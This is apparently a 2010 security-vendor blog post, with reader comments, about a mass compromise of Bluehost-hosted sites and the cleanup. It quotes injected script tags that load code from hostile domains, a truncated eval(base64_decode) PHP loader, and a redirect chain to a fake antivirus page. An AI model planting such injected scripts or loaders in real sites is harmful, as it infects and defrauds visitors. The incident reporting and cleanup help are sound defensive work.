Bluehost CEO blog & others exploited by domainameat.cc

We’re seeing that a good number of sites hosted at Bluehost have been hacked and infected with malware from domainameat.cc. The blog of Matt Heaton, CEO of Bluehost was also exploited (mattheaton.com).

After analyzing some of these sites, they were all hacked around 9/10am this morning. This is the malware script showing up at the bottom of the sites:

< script src = ” http://domainameat.cc/ js2.php “< </script>

This is the report from our scanner against their CEO’s blog:

You can see that a full directory of Spam files has been created at mattheaton.com/.files :

(domainameat.cc) which hosts the malware was just registered (Jun 25, 2010), and redirects visitors to http://www3.workfree23.net where a fake AV gets loaded:

Domain Name: DOMAINAMEAT.CC
Registrar: BIZCN.COM, INC.
Whois Server: whois.bizcn.com
Referral URL: http://www.bizcn.com
Name Server: NS1.MASTERHOSTINGIT.RU
Updated Date: 25-jun-2010
Creation Date: 25-jun-2010
Expiration Date: 25-jun-2011


This attack seems very similar to the one that affected GoDaddy in the recent past. All PHP files in the site get modified with a long string of base64 encoded text:

< ? php /**/ eval ( base64_decode("aWY ..oZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25
vJ10pK..

Clean up: The following script should be able to clean this up if your site got hacked: wordpress-fix.php. Just rename it to wordpress-fix.php and execute on your web site. Note that the name says wordpress-fix, but it will work for any site affected.

We’re still researching this attack and trying to determine the scale of it. If you are our client, you should already have received an alert from us if your site got hacked.

If you see any issues you think may be related, make sure to leave a comment.


If your site is hacked (or contains malware) and you need help, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

Scan your website for free:
About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • Pingback: Tweets that mention Bluehost CEO blog & others exploited by domainameat.cc | Sucuri Security -- Topsy.com()

  • Pingback: Tweets that mention http://blog.sucuri.net/2010/06/bluehost-ceo-blog-and-others-exploites-by-domainameat-cc.html?utm_source=pingback -- Topsy.com()

  • Steve

    Any clue as to how the criminals may have achieved this hack? Is this a brute force type hack coming from an exploit kit or something else?

    • frank

      i contact bluehost to find out whether the attack on my website was system-wide. I was passed to a tech who said he knew nothing of the attack so it must only be my website. I sent them (via chat) this article and their response was that this report was a lie. My site was definitely hit by the domainameat.cc malware, but so far the only references to it on the web all point to this article. I'm paranoid about trying this fix for that reason.

      • Charissa

        Believe me…this is a BH thing (other hosts are evidently dealing with it too). All my CMS sites are hacked daily. Trying to find out how it's getting in, and I'm looking for another host in the meantime (especially since BH denies knowledge of it). I have used the script these guys have provided and it cleans it up, but seems like around 2:30am EST something gets sent out and my sites get hit again.

  • http://dr-spangle.com/ dr-spangle

    Thank you so so much for the code, I was using something similar through ssh but it wasn't removing the new lines and hence messing up everything that opened sessions as the new lines sent headers! thanks so so much for this :P Nice to know it's the entire company I host with and not just my account this time. (last time a guy I host on my account accidently installed one of these things…

  • http://www.orphicpixel.com Mars

    its disappointing when i open my website and other website that are hosted to my account i am sure it is attacked by this malware

  • Pingback: Tweets that mention http://blog.sucuri.net/2010/06/bluehost-ceo-blog-and-others-exploites-by-domainameat-cc.html?feeutm_source=pingback -- Topsy.com()

  • vuvuzela

    just a garden variety SQL injection against a server shared by the affected sites… nothing special

  • Pingback: Tweets that mention http://blog.sucuri.net/2010/06/bluehost-ceo-blog-and-others-exploites-by-domainameat-cc.html?fee=utm_sourcepingback -- Topsy.com()

  • Duke

    I'm a bluehost subscriber. I was hit on half of my sites with the ZettaPetta hack. a few weeks ago. Yesterday morning I was hit on two others with this one. The good thing was I was just getting started . . . (Joomla installs, no actual altering) so I deleted and started over. Sometime this morning, I got hit again! I will run the script as soon as I get a chance! Thanks for this, BTW . . .

  • http://lukep.net/web Luke

    Thanks for the script, works like a charm, I got hit by this, I'm at hostmonster, I have no idea how they got in as all my WP sites are up to date and I frequently change FTP passwords using very complicated strings – can another account on a shared host get attacked and then cause me to experience this as well, even if it wasn't my own account that got hacked? I'm kinda baffled right now since I'm very careful about leaving any vulnerabilities open on my shared hosting accounts

    • Charissa

      I'm interested in knowing about the shared host thing too.

  • Pingback: Tweets that mention Bluehost CEO blog & others exploited by domainameat.cc | Sucuri LLC -- Topsy.com()

  • Tim

    Many many thanks for this script – it did the trick. My application uses Ajax and the JSON was being returned with the malware script attached. Luckiy all the calls failed on a parser error so I don't think too much damage was done – except for my app not working!

    How do I protect myself from these sort of attacks in the future?

  • Sam Rose

    @Luke, they are not getting your pw. Likely they are just injecting SQL and wordpress PHP script is passing it on because someone found a loophole in the code that allows this injection

  • Kelly

    Thank you so much!!! I have been going crazy trying to fix my site and just used the script – it works!

  • Lucho

    Thaaaaaaaaaaaaaaaaaaanks!

    It helpped a lot, but I still have no idea how i was attacked, was it a uploaded file? how can we ALL protect our selves better?

  • http://www.orphicpixel.com Mars

    it solved the problem, but .files folder is still there, been deleting it for 5 times
    My recent post 16 Fresh Example of Typhography Design

  • Bluehost customer

    i used the script, but the malware came back.

    as if they keep coming back?

  • http://blog.sucuri.net dremeda

    Make sure before you clean up the infected site, you sanitize locally. Meaning, make sure you run local antivirus and malware checks to ensure you're machine is not exploited.

    Once you've confirmed your machine is good to go, change all of your passwords (FTP/MySQL/WordPress/Other CMS/etc.)

    Once you've taken these steps, run the script again to see if it fixes the issue permanently. If It does not, please contact your provider and submit a ticket to document the event and get help from them.

    Hope this helps.

    Dre

    My recent post Top 15 WordPress People to Follow on Twitter

  • Pingback: Bluehost Talks Down Malware Percentages – Offers Sucuri a Forum Ban | Sucuri()

  • http://inboxrevenge.com Mark Giles

    Update to the redirection in domainameat .cc / js2 .php with spaces inserted for protection:
    setCookie(“pma_visited_theme2″,”1″,20);
    var url=”http://www3. helperav14 .co .cc/ ?p=p52dcWplanKHnc3KbmNToKV1iqHWnG2aXsiYxWicam2exA%3D%3D”;

    This in turn redirects to (spaces inserted for protection)
    http: // www1 .protection48 .co .cc

  • Long Time customer

    Could this be an inside job with unhappy campers at BH. My wp got hit too. Cleaned up the site manually removed the c64codes on every PHP file on server. Thanks.

  • http://twitter.com/jmiles_tms @jmiles_tms

    This is interesting, about a month ago, I got hit with this on a bunch of my hostmonster.com (bluehost's sister company) websites. Thanks for the fix. I had to do something similar to my accounts.

  • Preben

    IF you encounter an error like this ( Warning: session_start() [function.session-start]: Cannot send session cache limiter – headers already sent ) AFTER fixing it with this script, please see the first file that this error message names, and check that there are NO spaces og empty lines before the first < ? php tag. I had one file that had empty spaces, and that ruined my session_start.

  • Wessel van Rensburg

    Afraid I have the same problem, but this script dos not work when I try to execute it.

  • http://twitter.com/barrydeutsch @barrydeutsch

    Yesterday I had the domainmeat.cc exploit on my site leftycartoons.com, but I was able to get rid of it using the script downloaded from this page. Thank you!

    Unfortunately, today domainmeat.cc showed up on another site of mine, hereville.com. And this time the script doesn't get rid of it. Is it possible they've modified the exploit since yesterday to be immune to your script?

  • http://twitter.com/AzzamS @AzzamS

    Thanks a bunch guys. fixed it straightway.

  • rajeev

    thanks so much guys – we had 6 sites on that bluehost box and all the site owners were freaking out :)

  • Pingback: Bluehost Hacked this week | Coder's Eye()

  • Wilma

    Thanks so much! I called hostmonster support and they were useless! This fix worked for me. This is the second time this year my accounts there have been hacked.

  • Sammie

    Hello, sorry I have no experience with this but when you say execute it, do you mean upload it and then type in the .php file into the browser? Thanks!

  • http://www.nistor.co.uk Vlad Nistor

    Thanks guyz, i had no idea about this issue until Google Webmasters emailed me that my two site were sharing malware and my users would be getting warned. Ran the script, it's clean now. Why didn't the hosting company clean everything when they found out about this?

    Thanks again!

  • Daggerhart

    Here is something I used to clean up my wordpress DBs.
    It's not perfect because it matches any case of 'script src=' in post_contents, but it's worked well for me/.

    <code>
    // number of characters in the script insert
    $hack_string = '<script src="http://ae.awaue.com/7"></script>&#039;;
    $string_length = strlen($hack_string);

    global $wpdb;
    $query = " SELECT *
    FROM `wp_posts`
    WHERE `post_content` LIKE '%<script src=%'";
    $results = $wpdb->get_results($query);

    foreach ($results as $post)
    {
    //print $post->ID ."";
    $trimmed = substr($post->post_content,0,-$string_length);

    //print "normal:".htmlspecialchars($post->post_content)." <hr> trimmed:".htmlspecialchars($trimmed)."<hr>";

    if ($wpdb->update('wp_posts', array( 'post_content' => $trimmed ), array( 'ID' => $post->ID ), array( '%s'), array( '%d' )))
    {
    print "success on : ".$post->ID." ";
    }
    else
    {
    print "failed: ".$post->ID."";
    }
    }
    </code>

  • Eddie

    Bluehost was again hacked today. My sites included. This time they injected a link to a script from whereisdudescars.com

    Anyone else get this today. It happened at 1:27 PM today.

  • CCT

    Yep happened on my BH sites as well. I'm fed up with this. I'm moving to another host.

  • sang truong

    I tried your script and followed the instructions but it just would not work.
    Keep getting the following error:
    Warning: Unexpected character in input: '' (ASCII=92) state=1

    Parse error: syntax error, unexpected T_STRING

    How much would it cost to have someone remove all the codes from my host with the script?

  • Geoff

    I got hacked again too

    the whereisdudescars.com one
    last time it was the domainmeat.cc

    Sick of this, I'm moving hosts … their support people are programmed to deny anything has happened server-wide.

    It's my fault for having out-dated scripts …

    All .php files are attacked not just WordPress.

    I have a few rotate.php files on one site which show random images from the folder that the script is in.
    They get attacked too.

    Guess we're lucky they aren't deleting code.

  • http://twitter.com/auz1111 @auz1111

    I was able to squash our hack by running this bit of SQL – UPDATE wp_posts SET post_content = replace( post_content, '<script src="http://ao.euuaw.com/9">&#039;, ' ')

  • http://increasewebtraffic.com Martin

    yes I got the same too (using BH) – redirects or mentions this site whereisdudescars.com — what I don't know is how to execute the script above? how do you do that (execute it?) please explain in step by step so we can do it easily. Thanks :) m

  • http://renew-antivirus.com Antivirus

    I got Trojan Shell installed in my website and the main page is defaced by some kind of scary pictures. How the hack to clean up those messes.

  • Pingback: Reliable web hosting solutions | Big Blue Waves()